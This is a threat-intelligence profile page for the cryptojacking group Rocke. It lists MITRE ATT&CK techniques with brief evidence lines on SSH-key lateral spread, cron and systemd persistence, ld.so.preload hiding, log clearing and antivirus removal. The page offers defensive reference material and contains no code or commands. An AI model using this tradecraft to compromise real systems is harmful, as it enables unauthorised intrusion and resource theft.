3C-INT logo [Cyber]Crime Characterization for Intelligence FREE PREVIEW
You are exploring the Free preview. To unlock full read-only access to all public profiles and in-app notifications, create a free research account. For analyst / premium plans capabilities (editing, advanced tabs, exports), please contact us

Threat Actor Characterization

Back
You’re viewing the read-only version. Sign in for analyst tools (editors, promote draft, file/relations management, etc.)
Rocke

Rocke

ID: 376fdbde9d142e90f864932fcf37b58645882
Cybercrime Cybercriminal
Threat types: Cryptomining, Intrusion, Cloud Targeting
China UNKNOWN
Updated: 2026-01-13
Created: 2025-10-21
Progress: 35% Completeness: 28% Freshness: 50%
Operation zone: UNKNOWN
Aliases Limited alias preview
No aliases registered.
Actor Network Graph
Open Network Graph
Read-only preview for anonymous visitors. Sign in with a free Research account for full workspace.
MITRE ATT&CK®
confidence: medium
Actor Techniques page ATT&CK® Diagram

Rocke is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name Rocke comes from the email address "[email protected]" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between Rocke and the Iron Cybercrime Group, though this attribution has not been confirmed. Ref: https://attack.mitre.org/groups/G0106/


Technique Technique name Tactics Evidence
T1021.004 SSH TA0008
  • Remote Services: SSH - Rocke has spread its coinminer via SSH. · ref
T1027.002 Software Packing TA0005
  • Software Packing - Rocke's miner has created UPX-packed files in the Windows Start Menu Folder. · ref
T1027.004 Compile After Delivery TA0005
  • Compile After Delivery - Rocke has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection (GCC). · ref
T1036.005 Match Legitimate Resource Name or Location TA0005
  • Masquerading: Match Legitimate Resource Name or Location - Rocke has used shell scripts which download mining executables and saves them with the filename "java". · ref
T1053.003 Cron TA0002 TA0003 TA0004
  • Scheduled Task/Job: Cron - Rocke installed a cron job that downloaded and executed files from the C2. · ref
T1055.002 Portable Executable Injection TA0004 TA0005
  • Process Injection: Portable Executable Injection - Rocke's miner, "TermsHost.exe", evaded defenses by injecting itself into Windows processes, including Notepad.exe. · ref
T1059.004 Unix Shell TA0002
  • Command and Scripting Interpreter: Unix Shell - Rocke used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining malware. · ref
T1059.006 Python TA0002
  • Command and Scripting Interpreter: Python - Rocke has used Python-based malware to install and spread their coinminer. · ref
T1070.002 Clear Linux or Mac System Logs TA0005
  • Indicator Removal: Clear Linux or Mac System Logs - Rocke has cleared log files within the /var/log/ folder. · ref
T1070.004 File Deletion TA0005
  • Indicator Removal: File Deletion - Rocke has deleted files on infected machines. · ref
T1070.006 Timestomp TA0005
  • Indicator Removal: Timestomp - Rocke has changed the time stamp of certain files. · ref
T1071.001 Web Protocols TA0011
  • Web Protocols - Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol. · ref
T1102.001 Dead Drop Resolver TA0011
  • Dead Drop Resolver - Rocke has used Pastebin to check the version of beaconing malware and redirect to another Pastebin hosting updated malware. · ref
T1222.002 Linux and Mac File and Directory Permissions Modification TA0005
  • File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification - Rocke has changed file permissions of files so they could not be modified. · ref
T1496.001 Compute Hijacking TA0040
  • Resource Hijacking: Compute Hijacking - Rocke has distributed cryptomining malware. · ref
T1518.001 Security Software Discovery TA0007
  • Software Discovery: Security Software Discovery - Rocke used scripts which detected and uninstalled antivirus software. · ref
T1543.002 Systemd Service TA0003 TA0004
  • Create or Modify System Process: Systemd Service - Rocke has installed a systemd service script to maintain persistence. · ref
T1547.001 Registry Run Keys / Startup Folder TA0003 TA0004
  • Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder - Rocke's miner has created UPX-packed files in the Windows Start Menu Folder. · ref
T1552.004 Private Keys TA0006
  • Unsecured Credentials: Private Keys - Rocke has used SSH private keys on the infected machine to spread its coinminer throughout a network. · ref
T1562.001 Disable or Modify Tools TA0005
  • Impair Defenses: Disable or Modify Tools - Rocke used scripts which detected and uninstalled antivirus software. · ref
T1562.004 Disable or Modify System Firewall TA0005
  • Impair Defenses: Disable or Modify System Firewall - Rocke used scripts which killed processes and added firewall rules to block traffic related to other cryptominers. · ref
T1564.001 Hidden Files and Directories TA0005
  • Hide Artifacts: Hidden Files and Directories - Rocke downloaded a file "libprocesshider", which could hide files on the target system. · ref
T1574.006 Dynamic Linker Hijacking TA0003 TA0004 TA0005
  • Hijack Execution Flow: Dynamic Linker Hijacking - Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists. · ref
Strategic Intelligence
Limited preview
No content.
Full strategic intelligence is available in Analyst and Premium plans.
Executive Analyst Brief for CISO
Empty Limited preview
No content yet.
Tip: Hover the section title to learn what’s included in Analyst / Premium plans.
Executive brief now
Saved successfully.
Hunting Playbook
Empty Limited preview
No content yet.
Tip: Hover the section title to learn what’s included in Analyst / Premium plans.
Hunting Playbook now
Saved successfully.
IOC Appendix
Empty Limited preview
No content yet.
IOC Appendix now
Saved successfully.
OSINT Library
Empty Limited preview
No content yet.
OSINT Library now
Saved successfully.
Social Medial & Communication
SOCMINT integrated: 0/0
No social links registered for this profile.
Notes: preview mode hides sensitive social/contact details.
Reference Images/Associated Evidence Limited
No images found for this threat.